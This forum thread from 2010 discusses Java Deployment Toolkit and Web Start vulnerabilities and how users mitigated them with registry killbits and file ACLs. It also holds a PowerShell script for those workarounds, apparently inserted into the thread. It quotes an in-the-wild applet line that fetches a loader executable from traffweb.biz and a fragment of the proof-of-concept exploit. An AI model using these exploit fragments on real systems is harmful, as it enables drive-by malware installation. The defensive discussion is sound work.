Serious New Java Flaw Affects All Current Versions of Windows

Discussion in 'other security issues & news' started by mvario, Apr 9, 2010.

Thread Status:
Not open for further replies.
  1. mvario

    mvario Registered Member

    Joined:
    Sep 16, 2008
    Posts:
    339
    Location:
    Haddonfield, IL
    http://seclists.org/fulldisclosure/2010/Apr/119
    Code:
    -------------------
    Mitigation
    -----------------------
    
    If you believe your users may be affected, you should consider applying one of
    the workarounds described below as a matter of urgency.
    
    - Internet Explorer users can be protected by temporarily setting the killbit
      on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the
      deployment toolkit is not in widespread usage and is unlikely to impact end
      users.
    
    - Mozilla Firefox and other NPAPI based browser users can be protected using
      File System ACLs to prevent access to npdeploytk.dll. These ACLs can also be
      managed via GPO.
    
    Detailed documentation on killbits is provided by Microsoft here
    
    http://support.microsoft.com/kb/240797
    
    Domain administrators can deploy killbits and File System ACLs using GPOs, for
    more information on Group Policy, see Microsoft's Group Policy site, here
    
    http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx
    
    You may be tempted to kill the HKLM\...\JNLPFile\Shell\Open\Command key, but
    the author does not believe this is sufficient, as the plugin also provides
    enough functionality to install and downgrade JRE installations without
    prompting (seriously). However, if none of your affected users are local
    Administrators, this solution may work (untested).
    
    As always, if you do not require this feature, consider permanently disabling
    it in order to reduce attack surface.
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    OK, I see that I have to enable Java in Opera's Preferences. I can get Java to work on a test site, such as

    http://www.java.com/en/download/help/testvm.xml

    but the PoC for this vulnerability doesn't seem to work on Opera, as I showed above.


    ----
    rich
     
  3. arran

    arran Registered Member

    Joined:
    Feb 5, 2008
    Posts:
    1,156
    Just simply disable Java in your browser.
     
  4. linuxforall

    linuxforall Registered Member

    Joined:
    Feb 6, 2010
    Posts:
    2,137

    Good then us Opera users are safe. I keep Java disabled till I need it.
     
  5. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82

    Now what are file system ACLs? Group policy editing isn't even an enabled feature in what I have.
    gpsvc is there as a service but you can't access it other than that. Now on Firefox the toolkit is the NPAPI
    which can be disabled in the browser itself. See previous screenshot.

    And by setting the killbit to what? That is a registry key... not a setting.
     
  6. hierophant

    hierophant Registered Member

    Joined:
    Dec 18, 2009
    Posts:
    854
    The two vulnerabilities are ...

    Tavis Ormandy: Java Deployment Toolkit Performs Insufficient Validation of Parameters

    ... and ...

    Ruben Santamarta: [0DAY] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading


    At the risk of being tedious, here's how I've dealt with these vulnerabilities in my Win XP box. Although it'd be simplest to nuke Java entirely, I'm loath to go that far, because I occasionally want to run JAR apps. Perhaps I ought to relegate Java to play VMs.

    Anyway, regarding the Java Deployment Toolkit vulnerability, I followed Tavis Ormandy's guidance to set the killbit on the Deployment Toolkit CLSID in the registry (for IE) and deny access to npdeploytk.dll (for Firefox). After doing that, Tavis Ormandy's "harmless demonstration" (link to testcase.html prudently omitted) doesn't succeed. Regarding the Web Start vulnerability, I disabled all Java extensions and plugins in Firefox and xB Browser. I'm not aware of a test for that one. After doing all that, Java still works according to the Oracle test link that Rmus posted.

    Before trying Tavis Ormandy's "harmless demonstration", I verified that it's actually harmless. While blocked with NoScript in XB Browser, I checked out the testcase.html source, and saw that it uses calc.jar as its payload. After downloading calc.jar, I scanned it with Symantec Endpoint Protection v11.0, Prevx v3.0, Windows Defender v1.1, and online Kaspersky and avast! scanners, and found no problems. I then opened it in Winrar, and saw that it merely runs the Windows calculator (calc.exe).

    I then loaded testcase.html in xB Browser, and allowed the site. All I got was the warning "Additional plugins are required to display all the media on this page. [Install Missing Plugins...]". Just to be safe, I disabled Java Quick Starter. FWIW, I don't recall whether that came with XB Browser, or I installed it.

    With IE v7.0, loading testcase.html started Java and, shortly thereafter, Windows calculator. Owned, just like that. No warning, and no way to stop it.

    And so I set the killbit on the Deployment Toolkit CLSID in the registry. That is, I opened regedit and created "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}". I then created a DWORD Value and named it "Compatibility Flags", and then changed the value data to decimal 1024 (hex 400).

    After doing that, loading testcase.html in IE v7.0 did nothing, except for the warning "Done, but with errors on page." at the bottom. Cool.

    I then loaded testcase.html in Firefox v3.6, and got nada. After allowing the site in NoScript, however, I got owned (as expected). And so I denied access to npdeploytk.dll in C:\Program Files\Mozilla Firefox\plugins. That is, I right clicked on npdeploytk.dll, selected Properties|Security, and denied all types of access for all users/groups. BTW, simple file sharing must be off to do that.

    After doing that, loading testcase.html in Firefox v3.6 did nothing, and I got the warning "Additional plugins are required to display all the media on this page. [Install Missing Plugins...]". Just to be safe, I denied all access to copies of npdeploytk.dll in C:\Program Files\Java\jre6\bin and C:\Program Files\Java\jre6\bin\new_plugin.

    Regarding the Web Start vulnerability, I attempted to follow Ruben Santamarta's advice to "Disable javaws/javaws.exe in linux and Windows by any mean." What I did was disable all Java extensions and plugins in Firefox -- the extensions Java Quick Starter, and eight versions of Java Console (6.0.07, 6.0.10, 6.0.11, 6.0.13, 6.0.14, 6.0.15, 6.0.17 and 6.0.18) -- and the plugins Java Development Toolkit v6.0 and Java Platform SE 6 U18. I wonder why there are so many versions of Java Console. Anyone?

    I'm unclear what else to do. I find multiple copies of several files of the form javaws*.*: javaws.exe (7), javaws.jar (4), javaws.pack (2), javaws.policy (7), javaws-l10n.jar (2) and javawspl.dll (2). I suppose that I could deny access to all of them and see what happens. Anyone?

    Anyway, I trust that was helpful to someone here. Comments?
     
  7. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82
    OK, all that test link did that I saw was open the Windows calculator, which is an exe file, through Firefox. The link itself said to install missing plugins on that page but it opened up the calculator utility lol. What I was asking mainly with the Javaws file is how do you actually DISABLE it? Since it is a browser specific issue and nothing to do with the operating system in general, then it seems to me 64 bit versions of IE would be fine because in order to have Java run on 64 bit the 64 bit app needs to be downloaded just like the 32 bit one does. But maybe that is just me. Right now, I have NoScript running in Firefox which is my primary browser anyway and it disables script execution period from Java or otherwise. The reason there are that many versions of the Java console I am not real sure. I experienced that problem a while back when I upgraded to a newer version of Firefox. I had multiple console entries in the addons area, which isn't a big deal; just remove everything but the latest and it doesn't show up.
     
  8. hierophant

    hierophant Registered Member

    Joined:
    Dec 18, 2009
    Posts:
    854
    If it can open calculator, it can run anything, and it can get that anything from anywhere. That's not good.

    Right, Ruben Santamarta didn't say how to disable javaws. I disabled the browser plugins that use javaws. Perhaps he meant more. I don't know.

    That's fine, until you decide to let a site run. Then the fun may begin :gack:

    Thanks. It just struck me as sloppy to leave them all.
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    That sounds plausible, but the PoC didn't have code to exploit Opera, so we can't really test. I emailed the author of the Proof of Concept (PoC) and asked why he didn't include Opera. (See my first post with a sample of the code) It may be that Opera cannot be exploited, and I hope he will answer with an explanation.

    Meanwhile, I became curious about the PoC, and since I can't get it to run in my trusty unpatched IE6 on my desktop system with an old version of Java, I fired up my laptop which has IE8 and the recent Java version 6. Sure enough, the calculator launched!

    There were six files created in the user profile directory.

    Then I renamed Javaws.exe in the Java directory, and the exploit failed, so that workaround described in one of the articles is effective.

    EDIT: In the IE preferences, if I disable Java, the exploit does not work.

    ____________________________________________________________

    I've never gotten a real JAVA exploit in the wild to work on my desktop system with IE6, but I've seen a few exploits and they all attempt to launch a trojan executable. Here is one from 2006. The .jar file is cached:

    [screenshot: traffd_jar.gif]

    and the code for the malware:

    Code:
    applet archive="java.jar"
    value="http://traffweb.biz/dl/loaderadv799.exe
    
    Here are two others that were written up:

    JAVA Exploit Kit Malware #1
    January, 2010
    http://www.inreverse.net/?p=804
    Fake AV c/o PDF and Java exploits
    February, 2010
    http://www.sophos.com/blogs/sophoslabs/v/post/8622
    Another of the work-arounds for the current vulnerability is to set a kill-bit for the Class ID# CAFEEFAC......

    This prevents the code from creating the java object, as shown in the code:

    Code:
    if (window.navigator.appName == "Microsoft Internet Explorer") {
        var o = document.createElement("OBJECT");

        o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    
    This is nothing new, and has been recommended for previous Java exploits, as here:

    Java JRE deploytk.dll ActiveX Control Multiple BOF Vulnerabilities
    May, 2009
    http://www.securityspace.com/smysecure/catid.html?id=900354

    Class IDs are used in the Registry to identify particular applications installed on the computer. They are used by cybercriminals to call a particular application in their exploit. See here for details:

    CLSID (Class ID)
    http://www.fileresearchcenter.com/showglossaryterm.html?term=CLSID

    Microsoft explains that the "killbit" disables the Class Identifying number for a particular application:

    http://support.microsoft.com/kb/240797

    Now, PoCs cannot really test most security products for these types of exploits in the wild, since PoCs use trusted executables, naturally. And surely, we can eliminate the possibility that a cybercriminal using this code in an exploit package would launch the calculator executable! Also, if the exploit happened to get in the wild before anyone knew about it, we wouldn't have any suggested workarounds, and you would be at the mercy of having a malware executable automatically installed, unless you had other protection in place. Note in the Sophos analysis above that their product identified/blocked the .jar file in that exploit as Troj/Java-B.

    So, for a better test I modified the PoC to launch an executable not white listed on my computer, and the exploit was easily blocked.

    [screenshot: javatest.gif]

    In essence, this exploit is just another possible way to trigger the download of malware, and will probably be used for this purpose by cybercriminals. While applying bandaids (workarounds, patches, updates) is effective, they are reactive in that they aren't known until the vulnerability is discovered, creating the so-called 0-day scenario.

    Proactive protection against malware intrusion will prevent these types of exploits from succeeding no matter what application is used as the triggering device.

    Get the word out!

    ----
    rich
     
    Last edited: Apr 12, 2010
  10. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82
    The only problem I found with NoScript is it blocks almost every site from going through, so basically if you want access to something, even if you click allow on that site, it still blocks it from going through. As far as Java is concerned... a lot of places use it. But if you disable the control which allows it to run, it won't see it as being installed in the first place.
     
  11. mvario

    mvario Registered Member

    Joined:
    Sep 16, 2008
    Posts:
    339
    Location:
    Haddonfield, IL
    You could also do it with Local Security Settings (secpol.msc)
    Security Settings > Software Restriction Policy > Additional Rules and create a New Path Rule to disallow.

    or with Group Policy (gpedit.msc)
    Local Computer Policy > Computer Configuration > Windows Settings > Security Settings > Additional Rules and create a New Path Rule to disallow.

    If you do it the way you did with file security properties then it might be best to disallow only Read & Execute. Otherwise remember to change permissions before you update or when the fix arrives the files won't be able to be replaced with new ones.
     
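    The kill bit that hierophant set by hand in post #6 and the file ACL on npdeploytk.dll, combined with mvario's point just above about denying only Read & Execute, as one PowerShell script. This is an added example, not code from any poster, from Oracle/Sun or from the advisory; it assumes the CLSID and the three DLL paths quoted in the thread and an elevated prompt.

```powershell
# Added example, not from any poster: applies the two Deployment Toolkit workarounds
# from the thread (kill bit for IE, deny ACE on npdeploytk.dll for NPAPI browsers).
# Run from an elevated PowerShell prompt. The CLSID and paths are those quoted in the
# thread; adjust the paths if Java or Firefox are installed elsewhere (assumption).

$Clsid   = '{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}'
$KillKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
$KillBit = 0x400   # "Compatibility Flags" = decimal 1024 marks the control as unsafe

function Set-KillBit {
    # Create the per-CLSID key if it is missing, then write Compatibility Flags.
    if (-not (Test-Path -Path $KillKey)) {
        New-Item -Path $KillKey -Force | Out-Null
    }
    New-ItemProperty -Path $KillKey -Name 'Compatibility Flags' `
        -PropertyType DWord -Value $KillBit -Force | Out-Null
}

function Test-KillBit {
    # True only if bit 0x400 is set. A bitwise test, so other flags already present
    # on the key (or a mistyped value such as decimal 400) are not mistaken for it.
    if (-not (Test-Path -Path $KillKey)) { return $false }
    $props = Get-ItemProperty -Path $KillKey -ErrorAction SilentlyContinue
    $flags = $props.'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
}

function Deny-ReadExecute {
    param([string]$Path)
    # Deny Read & Execute for Everyone rather than all access, as mvario advises,
    # so an updater can still replace the file when a fixed JRE ships.
    if (-not (Test-Path -Path $Path)) { Write-Warning "not present: $Path"; return }
    $acl  = Get-Acl -Path $Path
    $rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule `
        -ArgumentList 'Everyone', 'ReadAndExecute', 'Deny'
    $acl.AddAccessRule($rule)
    Set-Acl -Path $Path -AclObject $acl
}

Set-KillBit
"Kill bit set for ${Clsid}: $(Test-KillBit)"

# The copies of the NPAPI plugin named in the thread.
$dlls = @(
    "$env:ProgramFiles\Mozilla Firefox\plugins\npdeploytk.dll",
    "$env:ProgramFiles\Java\jre6\bin\npdeploytk.dll",
    "$env:ProgramFiles\Java\jre6\bin\new_plugin\npdeploytk.dll"
)
foreach ($dll in $dlls) { Deny-ReadExecute -Path $dll }
```

    Once a fixed JRE is installed, remove the Deny ACE and the kill-bit key again, otherwise the updated plugin stays blocked.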
  12. hierophant

    hierophant Registered Member

    Joined:
    Dec 18, 2009
    Posts:
    854
    Thanks. Good points.
     
  13. herb_tea

    herb_tea Registered Member

    Joined:
    Jun 3, 2008
    Posts:
    5
    Location:
    NJ
    @hierophant

    Thanks for the details, helped greatly in securing my machine :)
     
  14. linuxforall

    linuxforall Registered Member

    Joined:
    Feb 6, 2010
    Posts:
    2,137
  15. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
    Anyone knows if Java will release a new update so soon after their recent quarterly update 19 release to patch these security holes o_O
     
  16. linuxforall

    linuxforall Registered Member

    Joined:
    Feb 6, 2010
    Posts:
    2,137
    There is talk on Java forum so I am sure an update is on its way.
     
  17. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
    Wow....then I do expect Java 6 update 19a soon ! :p
     
  18. mvario

    mvario Registered Member

    Joined:
    Sep 16, 2008
    Posts:
    339
    Location:
    Haddonfield, IL
    Last edited: Apr 14, 2010
  19. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    8,625
    Location:
    USA
    I removed Java from my laptop last week to see if I would miss it. So far... no.
     
  20. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    From mvario's link :thumb:

    http://krebsonsecurity.com/2010/04/unpatched-java-exploit-spotted-in-the-wild

    [screenshots: sp.gif, spy.gif, v.gif]

    It's an unusually large size 7.08 MB ! Probably badly coded ? Is it v1.00.0000 or v15.0.0.573 :D Copyright (C) 2008 Acresso Software Inc. So sue me :p

    Who'd want to be an AV vendor trying to keep up with all these rogues :(

    If you know anyone who visits songlyrics.com give them a heads up ;)
     
  21. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82
    If the Java code is already being exploited out there as Threatpost said it has been earlier, then Oracle won't have a choice but to actually do something about it. And as far as I am concerned the sooner it gets taken care of the better.
     
    Last edited: Apr 15, 2010
  22. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,713
    Location:
    George, S.Africa
  23. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
  24. arleetel

    arleetel Registered Member

    Joined:
    Apr 28, 2006
    Posts:
    14
    Does the update fix the vulnerability ?
    Thanks.
     
  25. Cudni

    Cudni Global Moderator

    Joined:
    May 24, 2009
    Posts:
    6,963
    Location:
    Somethingshire